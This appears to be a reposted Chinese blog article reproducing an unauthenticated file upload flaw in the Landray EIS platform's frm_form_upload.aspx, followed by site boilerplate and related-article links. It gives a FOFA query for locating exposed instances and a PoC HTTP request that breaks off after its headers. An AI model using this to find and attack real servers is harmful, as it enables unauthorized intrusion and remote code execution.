蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现

这篇具有很好参考价值的文章主要介绍了蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。

0x02 漏洞概述

蓝凌EIS智慧协同平台 frm_form_upload.aspx接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。

0x03 复现环境

FOFA:app="Landray-EIS智慧协同平台"

蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现,漏洞复现,安全,web安全

0x04 漏洞复现

PoC文章来源地址https://www.toymoban.com/news/detail-816658.html

POST /frm/frm_form_upload.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ASP.NET_SessionId=fqq0ks45w4yqpev52l3adnet; FIOA_IMG_FOLDER=FI; Lang=zh-c

到了这里,关于蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • el-upload批量手动上传,并用form表单校验上传文件

    手动上传设置:auto-upload=\\\"false\\\"

    2024年02月14日
    浏览(57)
  • Vue+Element(el-upload+el-form的使用)+springboot

    目录 1、编写模板  2、发请求调接口  3、后端返回数据 1.编写实体类 2.Controller类  3、interface接口(Service层接口)  4.Service(接口实现) 5、interface接口(Mapper层接口) 6、xml 7、goods.sql 8、goods_img 4、upload相关参数   说明(该案例是一个el-form和el-upload结合的,逻辑是:需要

    2024年01月25日
    浏览(51)
  • el-form与el-upload结合上传带附件的表单数据(前端篇)

    本文前端采用Vue + element-plus技术栈,前端项目参考yudao-ui-admin-vue3项目与 Geeker-Admin项目。 这篇文章是el-form与el-upload结合上传带附件的表单数据(后端篇)-CSDN博客姐妹篇,后端篇文章主要讲的是后端的实现逻辑,前端篇稍微简单一些,其实最主要的就是封装el-upload组件,供具

    2024年01月22日
    浏览(46)
  • ALVA 中标中臣数控项目,AR 远程协同助力烟草行业智慧升级

    喜报 | ALVA 中标中臣数控项目,AR 远程协同助力烟草行业智慧升级 2024-01-11 18:04:00 近日,ALVA Systems 中标上海中臣烟草数控技术有限公司(上海烟草机械有限责任公司下属企业)智能工厂 AR 远程协助系统开发项目。   *中标公告截图 该项目旨在通过 AR 远程协助应用赋能烟草行

    2024年01月24日
    浏览(39)
  • 基于边缘无线协同感知的低功耗物联网LPIOT技术:赋能智慧园区方案以及数字工厂领域

    回到2000年左右,物联网的底层技术支撑还是“ZigBee”,虽然当时ZigBee的终端功耗指标其实也并不庞大,但是,“拓扑复杂导致工程实施难度大”、“网络规模小导致的整体效率低下”都成为限制其发展的主要因素。 LPWAN,新一代物联网底层通讯技术,LPWAN技术的出现解决了上面

    2024年02月14日
    浏览(41)
  • 毕业设计-基于协同过滤算法的电商平台推荐系统

    目录 前言 课题背景和意义 实现技术思路 一、文献综述 二、基于用户协同过滤推荐系统算法 三、实证分析 四、总结 实现效果图样例 最后     📅大四是整个大学期间最忙碌的时光,一边要忙着备考或实习为毕业后面临的就业升学做准备,一边要为毕业设计耗费大量精力。近几

    2024年02月08日
    浏览(53)
  • 一站式敏捷研发协同平台,敏捷研发解决方案

     Leangoo领歌是一款 永久免费的专业的敏捷开发管理工具 ,提供端到端敏捷研发管理解决方案,涵盖敏捷需求管理、任务协同、进展跟踪、统计度量等。 Leangoo领歌上手快、实施成本低,可帮助企业快速落地敏捷,提质增效、缩短周期、加速创新。 Leangoo领歌区别于传统项目管

    2024年01月24日
    浏览(51)
  • 低代码平台协同OA升级,促进金融企业信息化建设

    编者按:数字化办公是信息化时代每个企业不可避免的,OA系统是数字化办公的关键环节。如何与时俱进,保持企业的活力,增强企业综合竞争力?本文分析了企业OA系统为什么需要升级,并进一步指出如何实现升级。 :OA升级,低代码平台,老厂商,信息化建设 OA系统

    2024年02月16日
    浏览(51)
  • 语义网与云计算:如何实现跨平台的数据共享和协同

    语义网和云计算是当今最热门的技术趋势之一,它们为人工智能、大数据分析和实时数据处理提供了强大的支持。在这篇文章中,我们将深入探讨语义网和云计算的核心概念、算法原理、实例代码和未来发展趋势。 语义网是一种基于语义技术的网络,它旨在解决信息的语义差

    2024年04月15日
    浏览(43)
  • 企业级WIKI协同工作平台搭建指南:Confluence深度使用与安装

    本文详细介绍了Confluence软件的特性和安装过程,Confluence是一款功能强大的办公软件,支持在线文档编辑、团队协作和内容管理。文章首先概述了Confluence的核心特性,包括空间管理、页面版本控制、编辑器功能、宏和附件管理等。

    2024年01月16日
    浏览(59)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包